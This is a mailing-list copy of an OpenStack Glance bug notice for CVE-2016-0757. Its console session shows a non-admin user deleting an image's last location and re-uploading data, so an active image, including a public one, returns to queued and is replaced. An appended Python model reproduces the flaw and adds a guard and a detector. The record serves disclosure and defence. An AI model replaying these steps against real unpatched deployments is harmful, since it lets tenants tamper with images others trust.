yahoo-eng-team team mailing list archive
Message #50535
[Bug 1525915] Re: [OSSA 2016-006] Normal user can change image status if show_multiple_locations has been set to true (CVE-2016-0757)
** Changed in: glance/kilo
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if
show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Released
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
A user (non-admin) can set an image back to the queued state by deleting
location(s) from the image when the "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise Glance has, in a similar way to that
described in OSSA 2015-019, as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T09:58:54Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:43:41Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This also works on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:11Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:43Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions
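The session above shows the image flipping active -> queued -> active while its id stays the same. The following is an added toy model of that status regression, written for this page and not taken from Glance: it reproduces the transition the report describes, shows the kind of guard that refuses it (an illustrative mitigation, not the upstream fix), and includes a check that flags an active -> queued transition in a sequence of image snapshots. The Image dataclass, the function names and the replacement upload bytes are all constructed for the example; the image id, owner, checksum, size and store URL are the ones shown in the report.

```python
import hashlib
from dataclasses import dataclass, field, replace
from typing import List, Optional, Tuple


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform an operation."""


@dataclass
class Image:
    """Minimal stand-in for the image fields shown by 'glance image-show' (constructed)."""
    id: str
    owner: str
    status: str = "queued"
    checksum: Optional[str] = None
    size: Optional[int] = None
    locations: List[str] = field(default_factory=list)


def delete_location(image: Image, url: str, *, caller: str, is_admin: bool = False,
                    show_multiple_locations: bool = True,
                    refuse_last_location: bool = False) -> Image:
    """Remove one location from an image and return the updated copy.

    With refuse_last_location=False this mirrors the report: once the last
    location is gone the image drops back to 'queued' and its size is cleared.
    With refuse_last_location=True a non-admin may not remove the last location
    of an active image (illustrative guard, an assumption of this example).
    """
    if not show_multiple_locations:
        # With the option off, users cannot edit the locations field at all.
        raise Forbidden("location editing is not exposed")
    if caller != image.owner and not is_admin:
        raise Forbidden("only the owner or an admin may edit locations")
    if url not in image.locations:
        raise KeyError(url)
    if (refuse_last_location and not is_admin
            and image.status == "active" and len(image.locations) == 1):
        raise Forbidden("refusing to remove the last location of an active image")
    remaining = [u for u in image.locations if u != url]
    if remaining:
        return replace(image, locations=remaining)
    # The regression the report shows: no locations left, so back to queued.
    return replace(image, locations=[], status="queued", size=None)


def upload(image: Image, data: bytes, *, caller: str, store_url: str) -> Image:
    """Store data for a queued image and activate it (md5 checksum, as in the report)."""
    if caller != image.owner:
        raise Forbidden("only the owner may upload image data")
    if image.status != "queued":
        raise Forbidden("data can only be uploaded to a queued image")
    return replace(image, status="active", size=len(data),
                   checksum=hashlib.md5(data).hexdigest(), locations=[store_url])


def find_status_regressions(history: List[Image]) -> List[Tuple[int, str, str]]:
    """Scan ordered snapshots of one image for active -> queued transitions.

    An active image is supposed to be immutable, so any such transition is a
    sign of the re-upload path the report describes. Returns
    (snapshot index, old status, new status) for each hit.
    """
    hits = []
    for i in range(1, len(history)):
        prev, cur = history[i - 1], history[i]
        if prev.status == "active" and cur.status == "queued":
            hits.append((i, prev.status, cur.status))
    return hits


# Values taken from the report's session; the walk-throughs are constructed.
IMAGE_ID = "f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc"
OWNER = "ab69274aa31a4fba8bf559af2b0b98bd"
STORE_URL = "file:///opt/stack/data/glance/images/" + IMAGE_ID
REPLACEMENT = b"replacement image data (constructed)"


def original_image() -> Image:
    return Image(id=IMAGE_ID, owner=OWNER, status="active",
                 checksum="eb9139e4942121f22bbc2afc0400b2a4", size=25165824,
                 locations=[STORE_URL])


def vulnerable_walkthrough() -> List[Image]:
    """Replay the report: location-delete, then image-upload, as the owner."""
    img = original_image()
    history = [img]
    img = delete_location(img, STORE_URL, caller=OWNER)   # active -> queued
    history.append(img)
    img = upload(img, REPLACEMENT, caller=OWNER, store_url=STORE_URL)  # queued -> active
    history.append(img)
    return history


def hardened_walkthrough() -> Image:
    """Same first step with the guard enabled; the image must be left untouched."""
    img = original_image()
    try:
        delete_location(img, STORE_URL, caller=OWNER, refuse_last_location=True)
    except Forbidden:
        return img
    raise AssertionError("guard did not fire")


if __name__ == "__main__":
    for snap in vulnerable_walkthrough():
        print(snap.status, snap.size, snap.checksum)
    print("regressions:", find_status_regressions(vulnerable_walkthrough()))
    print("guarded image status:", hardened_walkthrough().status)
```

Run stand-alone, the vulnerable walk-through prints the active/queued/active sequence from the report with a new checksum and size on the last line, while the guarded walk-through leaves the image active with its original location. The detection function is the piece worth lifting into real monitoring: applied to a time-ordered stream of image records, an active -> queued transition on an existing image id is the signal to alert on, whatever the mechanism that caused it.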